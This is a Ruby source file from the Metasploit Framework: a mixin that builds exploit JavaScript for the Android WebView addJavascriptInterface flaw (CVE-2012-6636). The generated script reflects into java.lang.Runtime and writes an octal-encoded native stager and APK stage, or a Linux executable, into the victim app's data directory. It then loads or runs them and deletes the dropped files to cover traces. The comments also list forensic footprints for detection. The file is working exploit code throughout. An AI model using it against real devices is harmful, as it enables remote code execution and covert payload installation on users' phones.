GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/msf/core/exploit/android.rb
# -*- coding: binary -*-
module Msf
  # Mixin for exploits that target the Android WebView addJavascriptInterface
  # reflection weakness (CVE-2012-6636): a Java object exposed to page
  # JavaScript lets that JavaScript reach java.lang.Runtime through
  # getClass().forName() and run commands as the hosting app. The helpers
  # below only build the JavaScript string; the including exploit module
  # delivers it.
  #
  # NOTE(review): `payload` is not defined in this file — presumably provided
  # by the including exploit module; confirm against the callers.
  module Exploit::Android

    # Since the NDK stager is used, arch detection must be performed
    SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]

    # Most android devices are ARM
    DEFAULT_ARCH = ARCH_ARMLE

    # Some of the default NDK build targets are named differently than
    # msf's builtin constants. This mapping allows the ndkstager file
    # to be looked up from the msf constant.
    # ARCH_X86 has no entry here; ndkstager uses the constant itself as the
    # directory name in that case.
    NDK_FILES = {
      ARCH_ARMLE => 'armeabi',
      ARCH_MIPSLE => 'mips'
    }

    # Builds the full exploit JavaScript.
    #
    # The generated page script defines `exec` (runs a command via
    # Runtime.exec and collects its stdout), then walks every property of
    # `top` with `attemptExploit`: objects on which Class.forName() fails are
    # skipped (the try/catch returns undefined), otherwise the script
    # reflectively fetches the process pid and the Runtime instance and runs
    # the dropper fragment chosen below. The loop stops at the first property
    # for which `attemptExploit` returns true.
    #
    # Note that the JavaScript `exec` helper stops reading on `read() <= 0`,
    # i.e. on EOF (-1) and also on a NUL byte, so NUL-separated output such as
    # /proc/<pid>/cmdline is truncated at the first NUL.
    #
    # The string is built with `%Q|...|`, so the JavaScript must never
    # contain a literal `|` character.
    #
    # @param arch [String] one of SUPPORTED_ARCHES, forwarded to the dropper
    # @return [String] the JavaScript to inject; the dropper is stager_js when
    #   the payload's first arch is ARCH_DALVIK, linux_exe_js otherwise
    def add_javascript_interface_exploit_js(arch)
      %Q|
function exec(runtime, cmdArr) {
var ch = 0;
var output = '';
var process = runtime.exec(cmdArr);
var input = process.getInputStream();

while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }
return output;
}

function attemptExploit(obj) {
// ensure that the object contains a native interface
try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }

// get the pid
var pid = obj.getClass()
.forName('android.os.Process')
.getMethod('myPid', null)
.invoke(null, null);

// get the runtime so we can exec
var runtime = obj.getClass()
.forName('java.lang.Runtime')
.getMethod('getRuntime', null)
.invoke(null, null);

#{payload.arch[0] == ARCH_DALVIK ? stager_js(arch) : linux_exe_js(arch)}

return true;
}

for (i in top) { if (attemptExploit(top[i]) === true) break; }
|
    end

    # JavaScript fragment for the Dalvik (Android Meterpreter) payload path.
    #
    # The generated code resolves the victim app's data directory from
    # /proc/<pid>/cmdline, writes the NDK stager shared object and the APK
    # stage there using `echo -e` with octal escapes, chmods both to 0700,
    # loads the .so with Runtime.load(), and finally deletes both files.
    #
    # Forensic footprint (useful for detection/response): short-lived files
    # named lib<8 random letters>.so and <5 random letters>.apk under
    # /data/data/<package>/, plus /system/bin/sh, chmod and rm children of
    # the app process.
    #
    # @param arch [String] one of SUPPORTED_ARCHES, selects the NDK stager build
    # @return [String] JavaScript that expects `runtime`, `pid` and `exec` to
    #   already be in scope (see add_javascript_interface_exploit_js)
    def stager_js(arch)
      # 5 letters: the same length as the 'PLOAD' marker ndkstager replaces,
      # so the patched shared object keeps its original size
      stagename = Rex::Text.rand_text_alpha(5)
      # '\\\\0' is the Ruby literal \\0, i.e. the escape prefix emitted before
      # each octal byte — presumably the \0NNN form `echo -e` expands; verify
      %Q|
// libraryData contains the bytes for a native shared object built via NDK
// which will load the "stage", which in this case is our android meterpreter stager.
var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";

// the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
// another stager which loads android meterpreter from the msf handler.
var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";

// get the process name, which will give us our data path
// $PPID does not seem to work on android 4.0, so we concat pids manually
var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
var stagePath = path + '/#{stagename}.apk';

// build the library and chmod it
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
runtime.exec(['chmod', '700', libraryPath]).waitFor();

// build the stage, chmod it, and load it
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
runtime.exec(['chmod', '700', stagePath]).waitFor();

// load the library
runtime.load(libraryPath);

// delete dropped files
runtime.exec(['rm', stagePath]).waitFor();
runtime.exec(['rm', libraryPath]).waitFor();
|
    end

    # JavaScript fragment for a native (non-Dalvik) payload.
    #
    # The generated code drops a Linux executable produced by
    # `payload.encoded_exe` into /data/data/<package>/<8 random letters>,
    # chmods it to 0700, starts it in the background (the trailing ` &` lets
    # waitFor() return immediately) and then deletes the file.
    #
    # Forensic footprint: a short-lived 0700 file with a random 8-letter name
    # under the app's data directory, and a /system/bin/sh child of the app
    # process that outlives the dropped file.
    #
    # @param arch [String] one of SUPPORTED_ARCHES, passed to encoded_exe
    # @return [String] JavaScript that expects `runtime`, `pid` and `exec` to
    #   already be in scope (see add_javascript_interface_exploit_js)
    def linux_exe_js(arch)
      platform_list = Msf::Module::PlatformList.new(Msf::Module::Platform::Linux)

      %Q|
var payloadData = "#{Rex::Text.to_octal(payload.encoded_exe(arch: arch, platform: platform_list), '\\\\0')}";

// get the process name, which will give us our data path
// $PPID does not seem to work on android 4.0, so we concat pids manually
var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
var payloadPath = path + '/#{Rex::Text.rand_text_alpha(8)}';

// build the library and chmod it
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+payloadData+'" > '+payloadPath]).waitFor();
runtime.exec(['chmod', '700', payloadPath]).waitFor();

// run the payload
runtime.exec(['/system/bin/sh', '-c', payloadPath + ' &']).waitFor();

// delete dropped files
runtime.exec(['rm', payloadPath]).waitFor();
|
    end

    # The NDK stager is used to launch a hidden APK
    #
    # Reads the prebuilt libndkstager.so for `arch` from the framework data
    # directory (data/exploits/CVE-2012-6636/<ndk dir>/) and patches its
    # 'PLOAD' marker with `stagename` — presumably the basename of the APK the
    # stager will load, matching the `<stagename>.apk` path in stager_js.
    #
    # @param stagename [String] replacement for the 'PLOAD' marker; should be
    #   exactly 5 bytes so the binary's layout is preserved (stager_js passes
    #   rand_text_alpha(5))
    # @param arch [String] msf arch constant; mapped through NDK_FILES, or used
    #   verbatim as the directory name when unmapped (e.g. ARCH_X86)
    # @return [String, nil] the patched binary, or nil when 'PLOAD' is not
    #   present, because gsub! is the last expression and returns nil on no change
    # @raise [Errno::ENOENT] if no stager file exists for `arch`
    def ndkstager(stagename, arch)
      stager_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2012-6636", NDK_FILES[arch] || arch, 'libndkstager.so')
      # binary mode: the file is an ELF object, not text
      data = File.read(stager_file, mode: 'rb')
      # File.read returns a fresh String, so mutating it in place is safe
      data.gsub!('PLOAD', stagename)
    end

  end
end